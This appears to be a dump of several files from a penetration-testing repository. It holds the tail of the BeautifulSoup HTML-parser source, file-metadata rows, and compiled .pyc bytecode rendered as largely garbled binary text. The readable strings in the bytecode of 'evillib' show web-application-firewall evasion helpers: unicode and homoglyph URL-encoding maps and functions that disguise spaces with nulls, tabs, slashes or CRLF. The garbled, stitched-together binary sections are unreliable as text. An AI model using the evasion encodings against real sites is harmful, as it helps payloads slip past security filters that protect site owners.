semicolon. data = "&amp;%s" % ref if not data: # This case is different from the one above, because we # haven't already gone through a supposedly comprehensive # mapping of entities to Unicode characters. We might not # have gone through any mapping at all. So the chances are # very high that this is a real entity, and not a # misplaced ampersand. data = "&%s;" % ref self.handle_data(data) def handle_decl(self, data): "Handle DOCTYPEs and the like as Declaration objects." self._toStringSubclass(data, Declaration) def parse_declaration(self, i): """Treat a bogus SGML declaration as raw data. Treat a CDATA declaration as a CData object.""" j = None if self.rawdata[i:i+9] == '<![CDATA[': k = self.rawdata.find(']]>', i) if k == -1: k = len(self.rawdata) data = self.rawdata[i+9:k] j = k+3 self._toStringSubclass(data, CData) else: try: j = SGMLParser.parse_declaration(self, i) except SGMLParseError: toHandle = self.rawdata[i:] self.handle_data(toHandle) j = i + len(toHandle) return j class BeautifulSoup(BeautifulStoneSoup): """This parser knows the following facts about HTML: * Some tags have no closing tag and should be interpreted as being closed as soon as they are encountered. * The text inside some tags (ie. 'script') may contain tags which are not really part of the document and which should be parsed as text, not tags. If you want to parse the text as tags, you can always fetch it and parse it explicitly. * Tag nesting rules: Most tags can't be nested at all. For instance, the occurance of a <p> tag should implicitly close the previous <p> tag. <p>Para1<p>Para2 should be transformed into: <p>Para1</p><p>Para2 Some tags can be nested arbitrarily. For instance, the occurance of a <blockquote> tag should _not_ implicitly close the previous <blockquote> tag. Alice said: <blockquote>Bob said: <blockquote>Blah should NOT be transformed into: Alice said: <blockquote>Bob said: </blockquote><blockquote>Blah Some tags can be nested, but the nesting is reset by the interposition of other tags. For instance, a <tr> tag should implicitly close the previous <tr> tag within the same <table>, but not close a <tr> tag in another table. <table><tr>Blah<tr>Blah should be transformed into: <table><tr>Blah</tr><tr>Blah but, <tr>Blah<table><tr>Blah should NOT be transformed into <tr>Blah<table></tr><tr>Blah Differing assumptions about tag nesting rules are a major source of problems with the BeautifulSoup class. If BeautifulSoup is not treating as nestable a tag your page author treats as nestable, try ICantBelieveItsBeautifulSoup, MinimalSoup, or BeautifulStoneSoup before writing your own subclass.""" def __init__(self, *args, **kwargs): if not kwargs.has_key('smartQuotesTo'): kwargs['smartQuotesTo'] = self.HTML_ENTITIES kwargs['isHTML'] = True BeautifulStoneSoup.__init__(self, *args, **kwargs) SELF_CLOSING_TAGS = buildTagMap(None, ['br' , 'hr', 'input', 'img', 'meta', 'spacer', 'link', 'frame', 'base']) PRESERVE_WHITESPACE_TAGS = set(['pre', 'textarea']) QUOTE_TAGS = {'script' : None, 'textarea' : None} #According to the HTML standard, each of these inline tags can #contain another tag of the same type. Furthermore, it's common #to actually use these tags this way. NESTABLE_INLINE_TAGS = ['span', 'font', 'q', 'object', 'bdo', 'sub', 'sup', 'center'] #According to the HTML standard, these block tags can contain #another tag of the same type. Furthermore, it's common #to actually use these tags this way. NESTABLE_BLOCK_TAGS = ['blockquote', 'div', 'fieldset', 'ins', 'del'] #Lists can contain other lists, but there are restrictions. NESTABLE_LIST_TAGS = { 'ol' : [], 'ul' : [], 'li' : ['ul', 'ol'], 'dl' : [], 'dd' : ['dl'], 'dt' : ['dl'] } #Tables can contain other tables, but there are restrictions. NESTABLE_TABLE_TAGS = {'table' : [], 'tr' : ['table', 'tbody', 'tfoot', 'thead'], 'td' : ['tr'], 'th' : ['tr'], 'thead' : ['table'], 'tbody' : ['table'], 'tfoot' : ['table'], } NON_NESTABLE_BLOCK_TAGS = ['address', 'form', 'p', 'pre'] #If one of these tags is encountered, all tags up to the next tag of #this type are popped. RESET_NESTING_TAGS = buildTagMap(None, NESTABLE_BLOCK_TAGS, 'noscript', NON_NESTABLE_BLOCK_TAGS, NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS) NESTABLE_TAGS = buildTagMap([], NESTABLE_INLINE_TAGS, NESTABLE_BLOCK_TAGS, NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS) # Used to detect the charset in a META tag; see start_meta CHARSET_RE = re.compile("((^|;)\s*charset=)([^;]*)", re.M) def start_meta(self, attrs): """Beautiful Soup can detect a charset included in a META tag, try to convert the document to that charset, and re-parse the document from the beginning.""" httpEquiv = None contentType = None contentTypeIndex = None tagNeedsEncodingSubstitution = False for i in range(0, len(attrs)): key, value = attrs[i] key = key.lower() if key == 'http-equiv': httpEquiv = value elif key == 'content': contentType = value contentTypeIndex = i if httpEquiv and contentType: # It's an interesting meta tag. match = self.CHARSET_RE.search(contentType) if match: if (self.declaredHTMLEncoding is not None or self.originalEncoding == self.fromEncoding): # An HTML encoding was sniffed while converting # the document to Unicode, or an HTML encoding was # sniffed during a previous pass through the # document, or an encoding was specified # explicitly and it worked. Rewrite the meta tag. def rewrite(match): return match.group(1) + "%SOUP-ENCODING%" newAttr = self.CHARSET_RE.sub(rewrite, contentType) attrs[contentTypeIndex] = (attrs[contentTypeIndex][0], newAttr) tagNeedsEncodingSubstitution = True else: # This is our first pass through the document. # Go through it again with the encoding information. newCharset = match.group(3) if newCharset and newCharset != self.originalEncoding: self.declaredHTMLEncoding = newCharset self._feed(self.declaredHTMLEncoding) raise StopParsing pass tag = self.unknown_starttag("meta", attrs) if tag and tagNeedsEncodingSubstitution: tag.containsSubstitutions = True class StopParsing(Exception): pass class ICantBelieveItsBeautifulSoup(BeautifulSoup): """The BeautifulSoup class is oriented towards skipping over common HTML errors like unclosed tags. However, sometimes it makes errors of its own. For instance, consider this fragment: <b>Foo<b>Bar</b></b> This is perfectly valid (if bizarre) HTML. However, the BeautifulSoup class will implicitly close the first b tag when it encounters the second 'b'. It will think the author wrote "<b>Foo<b>Bar", and didn't close the first 'b' tag, because there's no real-world reason to bold something that's already bold. When it encounters '</b></b>' it will close two more 'b' tags, for a grand total of three tags closed instead of two. This can throw off the rest of your document structure. The same is true of a number of other tags, listed below. It's much more common for someone to forget to close a 'b' tag than to actually use nested 'b' tags, and the BeautifulSoup class handles the common case. This class handles the not-co-common case: where you can't believe someone wrote what they did, but it's valid HTML and BeautifulSoup screwed up by assuming it wouldn't be.""" I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS = \ ['em', 'big', 'i', 'small', 'tt', 'abbr', 'acronym', 'strong', 'cite', 'code', 'dfn', 'kbd', 'samp', 'strong', 'var', 'b', 'big'] I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS = ['noscript'] NESTABLE_TAGS = buildTagMap([], BeautifulSoup.NESTABLE_TAGS, I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS, I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS) class MinimalSoup(BeautifulSoup): """The MinimalSoup class is for parsing HTML that contains pathologically bad markup. It makes no assumptions about tag nesting, but it does know which tags are self-closing, that <script> tags contain Javascript and should not be parsed, that META tags may contain encoding information, and so on. This also makes it better for subclassing than BeautifulStoneSoup or BeautifulSoup.""" RESET_NESTING_TAGS = buildTagMap('noscript') NESTABLE_TAGS = {} class BeautifulSOAP(BeautifulStoneSoup): """This class will push a tag with only a single string child into the tag's parent as an attribute. The attribute's name is the tag name, and the value is the string child. An example should give the flavor of the change: <foo><bar>baz</bar></foo> => <foo bar="baz"><bar>baz</bar></foo> You can then access fooTag['bar'] instead of fooTag.barTag.string. This is, of course, useful for scraping structures that tend to use subelements instead of attributes, such as SOAP messages. Note that it modifies its input, so don't print the modified version out. I'm not sure how many people really want to use this class; let me know if you do. Mainly I like the name.""" def popTag(self): if len(self.tagStack) > 1: tag = self.tagStack[-1] parent = self.tagStack[-2] parent._getAttrMap() if (isinstance(tag, Tag) and len(tag.contents) == 1 and isinstance(tag.contents[0], NavigableString) and not parent.attrMap.has_key(tag.name)): parent[tag.name] = tag.contents[0] BeautifulStoneSoup.popTag(self) #Enterprise class names! It has come to our attention that some people #think the names of the Beautiful Soup parser classes are too silly #and "unprofessional" for use in enterprise screen-scraping. We feel #your pain! For such-minded folk, the Beautiful Soup Consortium And #All-Night Kosher Bakery recommends renaming this file to #"RobustParser.py" (or, in cases of extreme enterprisiness, #"RobustParserBeanInterface.class") and using the following #enterprise-friendly class aliases: class RobustXMLParser(BeautifulStoneSoup): pass class RobustHTMLParser(BeautifulSoup): pass class RobustWackAssHTMLParser(ICantBelieveItsBeautifulSoup): pass class RobustInsanelyWackAssHTMLParser(MinimalSoup): pass class SimplifyingSOAPParser(BeautifulSOAP): pass ###################################################### # # Bonus library: Unicode, Dammit # # This class forces XML data into a standard format (usually to UTF-8 # or Unicode). It is heavily based on code from Mark Pilgrim's # Universal Feed Parser. It does not rewrite the XML or HTML to # reflect a new encoding: that happens in BeautifulStoneSoup.handle_pi # (XML) and BeautifulSoup.start_meta (HTML). # Autodetects character encodings. # Download from http://chardet.feedparser.org/ try: import chardet # import chardet.constants # chardet.constants._debug = 1 except ImportError: chardet = None # cjkcodecs and iconv_codec make Python know about more character encodings. # Both are available from http://cjkpython.i18n.org/ # They're built in if you use Python 2.4. try: import cjkcodecs.aliases except ImportError: pass try: import iconv_codec except ImportError: pass class UnicodeDammit: """A class for detecting the encoding of a *ML document and converting it to a Unicode string. If the source encoding is windows-1252, can replace MS smart quotes with their HTML or XML equivalents.""" # This dictionary maps commonly seen values for "charset" in HTML # meta tags to the corresponding Python codec names. It only covers # values that aren't in Python's aliases and can't be determined # by the heuristics in find_codec. CHARSET_ALIASES = { "macintosh" : "mac-roman", "x-sjis" : "shift-jis" } def __init__(self, markup, overrideEncodings=[], smartQuotesTo='xml', isHTML=False): self.declaredHTMLEncoding = None self.markup, documentEncoding, sniffedEncoding = \ self._detectEncoding(markup, isHTML) self.smartQuotesTo = smartQuotesTo self.triedEncodings = [] if markup == '' or isinstance(markup, unicode): self.originalEncoding = None self.unicode = unicode(markup) return u = None for proposedEncoding in overrideEncodings: u = self._convertFrom(proposedEncoding) if u: break if not u: for proposedEncoding in (documentEncoding, sniffedEncoding): u = self._convertFrom(proposedEncoding) if u: break # If no luck and we have auto-detection library, try that: if not u and chardet and not isinstance(self.markup, unicode): u = self._convertFrom(chardet.detect(self.markup)['encoding']) # As a last resort, try utf-8 and windows-1252: if not u: for proposed_encoding in ("utf-8", "windows-1252"): u = self._convertFrom(proposed_encoding) if u: break self.unicode = u if not u: self.originalEncoding = None def _subMSChar(self, orig): """Changes a MS smart quote character to an XML or HTML entity.""" sub = self.MS_CHARS.get(orig) if type(sub) == types.TupleType: if self.smartQuotesTo == 'xml': sub = '&#x%s;' % sub[1] else: sub = '&%s;' % sub[0] return sub def _convertFrom(self, proposed): proposed = self.find_codec(proposed) if not proposed or proposed in self.triedEncodings: return None self.triedEncodings.append(proposed) markup = self.markup # Convert smart quotes to HTML if coming from an encoding # that might have them. if self.smartQuotesTo and proposed.lower() in("windows-1252", "iso-8859-1", "iso-8859-2"): markup = re.compile("([\x80-\x9f])").sub \ (lambda(x): self._subMSChar(x.group(1)), markup) try: # print "Trying to convert document to %s" % proposed u = self._toUnicode(markup, proposed) self.markup = u self.originalEncoding = proposed except Exception, e: # print "That didn't work!" # print e return None #print "Correct encoding: %s" % proposed return self.markup def _toUnicode(self, data, encoding): '''Given a string and its encoding, decodes the string into Unicode. %encoding is a string recognized by encodings.aliases''' # strip Byte Order Mark (if present) if (len(data) >= 4) and (data[:2] == '\xfe\xff') \ and (data[2:4] != '\x00\x00'): encoding = 'utf-16be' data = data[2:] elif (len(data) >= 4) and (data[:2] == '\xff\xfe') \ and (data[2:4] != '\x00\x00'): encoding = 'utf-16le' data = data[2:] elif data[:3] == '\xef\xbb\xbf': encoding = 'utf-8' data = data[3:] elif data[:4] == '\x00\x00\xfe\xff': encoding = 'utf-32be' data = data[4:] elif data[:4] == '\xff\xfe\x00\x00': encoding = 'utf-32le' data = data[4:] newdata = unicode(data, encoding) return newdata def _detectEncoding(self, xml_data, isHTML=False): """Given a document, tries to detect its XML encoding.""" xml_encoding = sniffed_xml_encoding = None try: if xml_data[:4] == '\x4c\x6f\xa7\x94': # EBCDIC xml_data = self._ebcdic_to_ascii(xml_data) elif xml_data[:4] == '\x00\x3c\x00\x3f': # UTF-16BE sniffed_xml_encoding = 'utf-16be' xml_data = unicode(xml_data, 'utf-16be').encode('utf-8') elif (len(xml_data) >= 4) and (xml_data[:2] == '\xfe\xff') \ and (xml_data[2:4] != '\x00\x00'): # UTF-16BE with BOM sniffed_xml_encoding = 'utf-16be' xml_data = unicode(xml_data[2:], 'utf-16be').encode('utf-8') elif xml_data[:4] == '\x3c\x00\x3f\x00': # UTF-16LE sniffed_xml_encoding = 'utf-16le' xml_data = unicode(xml_data, 'utf-16le').encode('utf-8') elif (len(xml_data) >= 4) and (xml_data[:2] == '\xff\xfe') and \ (xml_data[2:4] != '\x00\x00'): # UTF-16LE with BOM sniffed_xml_encoding = 'utf-16le' xml_data = unicode(xml_data[2:], 'utf-16le').encode('utf-8') elif xml_data[:4] == '\x00\x00\x00\x3c': # UTF-32BE sniffed_xml_encoding = 'utf-32be' xml_data = unicode(xml_data, 'utf-32be').encode('utf-8') elif xml_data[:4] == '\x3c\x00\x00\x00': # UTF-32LE sniffed_xml_encoding = 'utf-32le' xml_data = unicode(xml_data, 'utf-32le').encode('utf-8') elif xml_data[:4] == '\x00\x00\xfe\xff': # UTF-32BE with BOM sniffed_xml_encoding = 'utf-32be' xml_data = unicode(xml_data[4:], 'utf-32be').encode('utf-8') elif xml_data[:4] == '\xff\xfe\x00\x00': # UTF-32LE with BOM sniffed_xml_encoding = 'utf-32le' xml_data = unicode(xml_data[4:], 'utf-32le').encode('utf-8') elif xml_data[:3] == '\xef\xbb\xbf': # UTF-8 with BOM sniffed_xml_encoding = 'utf-8' xml_data = unicode(xml_data[3:], 'utf-8').encode('utf-8') else: sniffed_xml_encoding = 'ascii' pass except: xml_encoding_match = None xml_encoding_match = re.compile( '^<\?.*encoding=[\'"](.*?)[\'"].*\?>').match(xml_data) if not xml_encoding_match and isHTML: regexp = re.compile('<\s*meta[^>]+charset=([^>]*?)[;\'">]', re.I) xml_encoding_match = regexp.search(xml_data) if xml_encoding_match is not None: xml_encoding = xml_encoding_match.groups()[0].lower() if isHTML: self.declaredHTMLEncoding = xml_encoding if sniffed_xml_encoding and \ (xml_encoding in ('iso-10646-ucs-2', 'ucs-2', 'csunicode', 'iso-10646-ucs-4', 'ucs-4', 'csucs4', 'utf-16', 'utf-32', 'utf_16', 'utf_32', 'utf16', 'u16')): xml_encoding = sniffed_xml_encoding return xml_data, xml_encoding, sniffed_xml_encoding def find_codec(self, charset): return self._codec(self.CHARSET_ALIASES.get(charset, charset)) \ or (charset and self._codec(charset.replace("-", ""))) \ or (charset and self._codec(charset.replace("-", "_"))) \ or charset def _codec(self, charset): if not charset: return charset codec = None try: codecs.lookup(charset) codec = charset except (LookupError, ValueError): pass return codec EBCDIC_TO_ASCII_MAP = None def _ebcdic_to_ascii(self, s): c = self.__class__ if not c.EBCDIC_TO_ASCII_MAP: emap = (0,1,2,3,156,9,134,127,151,141,142,11,12,13,14,15, 16,17,18,19,157,133,8,135,24,25,146,143,28,29,30,31, 128,129,130,131,132,10,23,27,136,137,138,139,140,5,6,7, 144,145,22,147,148,149,150,4,152,153,154,155,20,21,158,26, 32,160,161,162,163,164,165,166,167,168,91,46,60,40,43,33, 38,169,170,171,172,173,174,175,176,177,93,36,42,41,59,94, 45,47,178,179,180,181,182,183,184,185,124,44,37,95,62,63, 186,187,188,189,190,191,192,193,194,96,58,35,64,39,61,34, 195,97,98,99,100,101,102,103,104,105,196,197,198,199,200, 201,202,106,107,108,109,110,111,112,113,114,203,204,205, 206,207,208,209,126,115,116,117,118,119,120,121,122,210, 211,212,213,214,215,216,217,218,219,220,221,222,223,224, 225,226,227,228,229,230,231,123,65,66,67,68,69,70,71,72, 73,232,233,234,235,236,237,125,74,75,76,77,78,79,80,81, 82,238,239,240,241,242,243,92,159,83,84,85,86,87,88,89, 90,244,245,246,247,248,249,48,49,50,51,52,53,54,55,56,57, 250,251,252,253,254,255) import string c.EBCDIC_TO_ASCII_MAP = string.maketrans( \ ''.join(map(chr, range(256))), ''.join(map(chr, emap))) return s.translate(c.EBCDIC_TO_ASCII_MAP) MS_CHARS = { '\x80' : ('euro', '20AC'), '\x81' : ' ', '\x82' : ('sbquo', '201A'), '\x83' : ('fnof', '192'), '\x84' : ('bdquo', '201E'), '\x85' : ('hellip', '2026'), '\x86' : ('dagger', '2020'), '\x87' : ('Dagger', '2021'), '\x88' : ('circ', '2C6'), '\x89' : ('permil', '2030'), '\x8A' : ('Scaron', '160'), '\x8B' : ('lsaquo', '2039'), '\x8C' : ('OElig', '152'), '\x8D' : '?', '\x8E' : ('#x17D', '17D'), '\x8F' : '?', '\x90' : '?', '\x91' : ('lsquo', '2018'), '\x92' : ('rsquo', '2019'), '\x93' : ('ldquo', '201C'), '\x94' : ('rdquo', '201D'), '\x95' : ('bull', '2022'), '\x96' : ('ndash', '2013'), '\x97' : ('mdash', '2014'), '\x98' : ('tilde', '2DC'), '\x99' : ('trade', '2122'), '\x9a' : ('scaron', '161'), '\x9b' : ('rsaquo', '203A'), '\x9c' : ('oelig', '153'), '\x9d' : '?', '\x9e' : ('#x17E', '17E'), '\x9f' : ('Yuml', ''),} ####################################################################### #By default, act as an HTML pretty-printer. if __name__ == '__main__': import sys soup = BeautifulSoup(sys.stdin) print soup.prettify()
77,863
Python
.py
1,702
34.383079
186
0.584811
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,909
evillib.pyc
pwnieexpress_raspberry_pwn/src/pentest/waffit/libs/evillib.pyc
—Ú «„ªMc @sçddkZddkZddkZddkZddkZddklZlZddkZddklZdZ ddkl Z l Z hWdd6dd 6dd 6d d 6d d6dd6dd6dd6dd6dd6dd6dd6dd6dd 6d!d"6d#d$6d%d&6d'd(6d)d*6d+d,6d-d.6d/d06d1d26d3d46d5d66d7d86d9d:6d;d<6d=d>6d?d@6dAdB6dCdD6dEdF6dGdH6dIdJ6dKdL6dMdN6dOdP6dQdR6dSdT6dUdV6dWdX6dYdZ6d[d\6d]d^6d_d`6dadb6dcdd6dedf6dgdh6didj6dkdl6dmdn6dodp6dqdr6dsdt6dudv6dwdx6dydz6d{d|6d}d~6ddÄ6dÅdÇ6dÉdÑ6dÖdÜ6dádà6dâdä6dãdå6dçdé6dèdê6dëdí6dìdî6dïdñ6dódò6dôdö6dõdú6dùdû6düd†6d°d¢6d£d§6d•d¶6dßd®6d©d™6d´d¨6d≠dÆ6dØd∞6d±d≤6Z hd≥d 6Z d¥ÑZdµÑZed∂ÑZd∑ÑZd∏ÑZdπÑZd∫ÑZdªÑZdºÑZdΩÑZdæÑZdøÑZd¿d√d¡ÑÉYZd¬ÑZdS(ƒiˇˇˇˇN(turlparset urlunparse(t BeautifulSoups  Copyright (c) 2009, {Sandro Gauci|Wendel G. Henrique} All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of EnableSecurity or Trustwave nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. (tquotetunquotes%u0020t s%u2215t/s\s%u02b9t's%u0022t"s%u003et>s%u003ct<s%uff03t#s%uff01t!s%uff04t$s%uff0at*s%u0040t@s%uff0et.s%uff3ft_s%uff08t(s%uff09t)s%uff0ct,s%u0025t%s%uff0dt-s%uff1bt;s%uff1at:s%uff5ct|s%uff06t&s%uff0bt+s%uff1dt=s%uff41tas%uff21tAs%uff42tbs%uff22tBs%uff43tcs%uff23tCs%uff44tds%uff24tDs%uff45tes%uff25tEs%uff46tfs%uff26tFs%uff47tgs%uff27tGs%uff48ths%uff28tHs%uff49tis%uff29tIs%uff4atjs%uff2atJs%uff4btks%uff2btKs%uff4ctls%uff2ctLs%uff4dtms%uff2dtMs%uff4etns%uff2etNs%uff4ftos%uff2ftOs%uff50tps%uff30tPs%uff51tqs%uff31tQs%uff52trs%uff32tRs%uff53tss%uff33tSs%uff54tts%uff34tTs%uff55tus%uff35tUs%uff56tvs%uff36tVs%uff57tws%uff37tWs%uff58txs%uff38tXs%uff59tys%uff39tYs%uff5atzs%uff3atZs%uff10t0s%uff11t1s%uff12t2s%uff13t3s%uff14t4s%uff15t5s%uff16t6s%uff17t7s%uff18t8s%uff19t9s%ca%bcc CsÛtidÉ}t}t|É}|dd jo|id|dÉdS|ddjo t}nt|dÉdjo|d}nd}|d id É}t|Éd jo|d }nd}|d}|d }|||||fS( Nt urlparserithttpthttpstsscheme %s not supportediRiRi(shttpshttpsR^( tloggingt getLoggertFalseRterrortTruetlentsplittNone( ttargettlogtsslR9tpathttmptportthostnametquery((s/pentest/waffit/libs/evillib.pyt oururlparseÜs$    cCsñ|}|id|Éxgtid|ÉD]S}|dd!}||É}|id|É|id|É|i||É}q*W|id|É|S(Nspath is currently %ss (\[.*?\])iiˇˇˇˇs String was %ssString became %ssthe path is now %s(tdebugtretfindalltreplace(RjtmodfuncRhR5tourstrtnewstr((s/pentest/waffit/libs/evillib.pyt modifyurlús  ccsª|id|Éx£tid|ÉD]è}|dd!}xy|D]q}|oti|É}n|id|É|id|É|i||ÉiddÉid dÉ}|Vq>Wq$WdS( Nspath is currently %ss (\[.*?\])iiˇˇˇˇs String was %ssString became %st]R^t[(RpRqRrturllibRRs(RjtnewstrsRhtencodeR5RuRvtnewpath((s/pentest/waffit/libs/evillib.pyt modifypath©s *ccsot|É}x\tt|ÉÉD]H}x?tdÉD]1}|}t|É||<tdi|ÉÉVq2WqWdS(NiR^(tlisttxrangeRdtchrRtjoin(Rut listourstrtposR-t newlistourstr((s/pentest/waffit/libs/evillib.pytbruteforceasciiµs  cCsJtÉ}x:|D]2}ti|Éo|t|7}q||7}qW|S(N(tstrtunicodemappingthas_key(RuRvt character((s/pentest/waffit/libs/evillib.pytunicodeurlencodeΩs cCs2tÉ}x|D]}||d7}qWt|ÉS(Nt(RáR(RuRvRä((s/pentest/waffit/libs/evillib.pytnullify«s  cCs|i||É}|S(N(Rs(RutorigchartnewcharRv((s/pentest/waffit/libs/evillib.pyt replacecharsÕscCstt|ddÉÉS(NRRå(RRê(Ru((s/pentest/waffit/libs/evillib.pyt nullifyspaces—scCst|ddÉS(NRR(Rê(Ru((s/pentest/waffit/libs/evillib.pyt slashspaces‘scCst|ddÉS(NRs (Rê(Ru((s/pentest/waffit/libs/evillib.pyt tabifyspaces◊scCst|ddÉS(NRs (Rê(Ru((s/pentest/waffit/libs/evillib.pyt crlfspaces⁄scCst|ddÉS(NRs''(Rê(Ru((s/pentest/waffit/libs/evillib.pytbackslashquotes›stwaftoolsenginecBsPeZddeddedÑZdd eed edÑZd dddÑZRS( swww.microsoft.comiPiRcCså||_|djo|o d}q1d}n||_||_||_tÉ|_d|_||_d|_ ||_ t É|_ dS(s} target: the hostname or ip of the target server port: defaults to 80 ssl: defaults to false iªiPiN( RgRfRlRit debugleveltdicttcachedresponsest requestnumberRjt redirectnotfollowredirectRt crawlpaths(tselfRgRlRiRóRjRú((s/pentest/waffit/libs/evillib.pyt__init__·s            tGETcCs∑|i}|o=|id7_|idjo|iidÉt}qVn d|_|djo |i}n|dj otdÑ|iÉÉ}n h}h}d|jod|d<nd |jod |d <nd |jod |d<nt |||gÉ} |o`|i i | Éo&|ii d||fÉ|i | S|ii d| |i iÉfÉnt idjoN|io"ti|i|iddÉ} qti|i|iddÉ} n?|ioti|i|iÉ} nti|i|iÉ} |idjo(|idjo| i|iÉqFny4|iid||fÉ| i||d|ÉWn.tij o|iid|iÉdSX|id7_y2| iÉ} | iÉ} | iÉ| | f} Wn;tititi fj o|iidÉd} nX|o| |i | <n| oj| i!d$joV|oK| i"dÉo7| i"dÉ}|iid|Ét#|É}|dj o⁄|\}}}}}|p d}n|djo |i}n|djo |i}n|i$d Épd |}n|||f|i|i|fjo%|i|||||d!t%É} q£|iid"|Éqß|iid#| i"dÉÉq´qØq≥n| S(%Niis2We received way too many redirects.. stopping thaticSs |iÉS((tlower(RK((s/pentest/waffit/libs/evillib.pyt<lambda>ss user-agents]Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b1) Gecko/20081007 Firefox/3.0s User-Agentsaccept-charsetsISO-8859-1,utf-8;q=0.7,*;q=0.7sAccept-Charsettaccepts*/*tAcceptsUsing cached version of %s, %ss%s not found in %sittimeoutii s Sending %s %stheaderss%Could not initialize connection to %ss!Hey.. they closed our connection!i-i.i3tlocationsRedirected to %siPR^Rtcomingfromredirs*Tried to redirect to a different server %ss%s is not a well formatted url(i-i.i3(&RúRõRhRbRaRfRjtmaptkeysRáRôRâRptsyst hexversionRithttplibtHTTPSConnectionRgRltHTTPConnectionRótset_debugleveltinfotrequesttsockettwarnRöt getresponsetreadtcloseR•t BadStatusLinetstatust getheaderRot startswithRc(RûtmethodRjtusecachet cacheresponseR¶R®Rút knownheadersR1R+tresponset responsebodyR?tnewloctpretRgRlRnRi((s/pentest/waffit/libs/evillib.pyR≤¯sñ         ' ""             %-icCs}|iid|ÉtÉ}||jo|iid|ÉdS|id|É}|djodS|\}}yt|É}Wn|iidÉdSX|dÉ} xç| D]Ö} yi| d} | dj oNt| É} | ddjo/|i | djo|iid | Éw±n| d djo|iid | Éw±n| d}|i dÉpd|}nt | dÉd jo?t dd|| d| ddfÉ} |iid| É| S||i joDti|É} |iid| É|i i| É|i| ÉqnWq±tj oq±Xq±Wx<|D]4}|id|d|dd|É}|o|SqAWdS(NsCrawler is visiting %ssmaximum depth %s reachedRjs!could not parse the response bodyRthrefiR^s3Ignoring link because it is not on the same site %siR\R]s.Ignoring link because it is not an http uri %siRiisFound query %ssadding %s for crawlingtcurdepthtmaxdepth(shttpshttpsR^(RhRpRR±R≤RfRR¥RRgRªRdRRùRzRtappendtKeyErrort querycrawler(RûRjR≈R∆tlocalcrawlpathsR?R¿R¡tsoupttagsttagRƒttmpuRßtnextpath((s/pentest/waffit/libs/evillib.pyR…Os\        % & "N(t__name__t __module__RaRcRüRfR≤R…(((s/pentest/waffit/libs/evillib.pyRñ‡s    UcCsod}t|Ét|ÉjotS||jotSx2|D]*}|i|É|i|ÉjotSq=WtS(Nt connection(RdRatcountRc(theaderR!Rä((s/pentest/waffit/libs/evillib.pytscrambledheaderÄs  ((RqR´R≠R≥RzRRR_Rt __license__RRRàthomoglyphicmappingRoRwRcR~RÜRãRçRêRëRíRìRîRïRñR’(((s/pentest/waffit/libs/evillib.pyt<module>sfi                  †
13,390
Python
.py
92
143.684783
1,618
0.443291
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,910
BeautifulSoup.pyc
pwnieexpress_raspberry_pwn/src/pentest/waffit/libs/BeautifulSoup.pyc
—Ú «„ªMc@s§dZddklZdZdZdZdZddklZl Z ddk Z ddk Z ddk Z ddk Z ddkZydd klZWnej o hZnXyeWn#ej odd klZnXe id Ée_e id Éie _d ZdfdÑÉYZdeefdÑÉYZdefdÑÉYZdefdÑÉYZdefdÑÉYZdefdÑÉYZ defdÑÉYZ!dfdÑÉYZ"de#fdÑÉYZ$d ÑZ%d!ÑZ&d"ÑZ'd#e!efd$ÑÉYZ(d%e(fd&ÑÉYZ)d'e*fd(ÑÉYZ+d)e)fd*ÑÉYZ,d+e)fd,ÑÉYZ-d-e(fd.ÑÉYZ.d/e(fd0ÑÉYZ/d1e)fd2ÑÉYZ0d3e,fd4ÑÉYZ1d5e-fd6ÑÉYZ2d7e.fd8ÑÉYZ3yddk4Z4Wnej o e5Z4nXyddk6Z7Wnej onXyddk8Z8Wnej onXd9fd:ÑÉYZ9e:d;jo*ddk;Z;e)e;i<ÉZ=e=i>ÉGHndS(<sÊ Beautiful Soup Elixir and Tonic "The Screen-Scraper's Friend" http://www.crummy.com/software/BeautifulSoup/ Beautiful Soup parses a (possibly invalid) XML or HTML document into a tree representation. It provides methods and Pythonic idioms that make it easy to navigate, search, and modify the tree. A well-formed XML/HTML document yields a well-formed data structure. An ill-formed XML/HTML document yields a correspondingly ill-formed data structure. If your document is only locally well-formed, you can use this library to find and process the well-formed part of it. Beautiful Soup works with Python 2.2 and up. It has no external dependencies, but you'll have more success at converting data to UTF-8 if you also install these three packages: * chardet, for auto-detecting character encodings http://chardet.feedparser.org/ * cjkcodecs and iconv_codec, which add more encodings to the ones supported by stock Python. http://cjkpython.i18n.org/ Beautiful Soup defines classes for two main parsing strategies: * BeautifulStoneSoup, for parsing XML, SGML, or your domain-specific language that kind of looks like XML. * BeautifulSoup, for parsing run-of-the-mill HTML code, be it valid or invalid. This class has web browser-like heuristics for obtaining a sensible 